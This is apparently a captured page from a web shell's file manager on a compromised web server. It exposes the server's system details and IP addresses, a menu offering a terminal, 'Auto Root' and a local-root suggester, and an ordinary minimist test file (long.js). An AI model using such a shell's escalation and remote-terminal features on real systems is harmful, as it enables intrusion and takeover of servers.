Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 18.188.39.197
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
unp_probe /
node_modules /
minimist /
test /
Delete
Unzip
Name
Size
Permission
Date
Action
dash.js
726
B
-rw-r--r--
2014-01-10 18:26
default_bool.js
454
B
-rw-r--r--
2013-06-25 07:57
dotted.js
441
B
-rw-r--r--
2013-08-28 22:57
long.js
779
B
-rw-r--r--
2013-06-25 06:52
parse.js
7.32
KB
-rw-r--r--
2014-02-21 04:46
parse_modified.js
240
B
-rw-r--r--
2013-06-25 07:29
short.js
1.56
KB
-rw-r--r--
2014-02-09 03:45
whitespace.js
191
B
-rw-r--r--
2013-06-25 08:15
Save
Rename
var test = require('tape'); var parse = require('../'); test('long opts', function (t) { t.deepEqual( parse([ '--bool' ]), { bool : true, _ : [] }, 'long boolean' ); t.deepEqual( parse([ '--pow', 'xixxle' ]), { pow : 'xixxle', _ : [] }, 'long capture sp' ); t.deepEqual( parse([ '--pow=xixxle' ]), { pow : 'xixxle', _ : [] }, 'long capture eq' ); t.deepEqual( parse([ '--host', 'localhost', '--port', '555' ]), { host : 'localhost', port : 555, _ : [] }, 'long captures sp' ); t.deepEqual( parse([ '--host=localhost', '--port=555' ]), { host : 'localhost', port : 555, _ : [] }, 'long captures eq' ); t.end(); });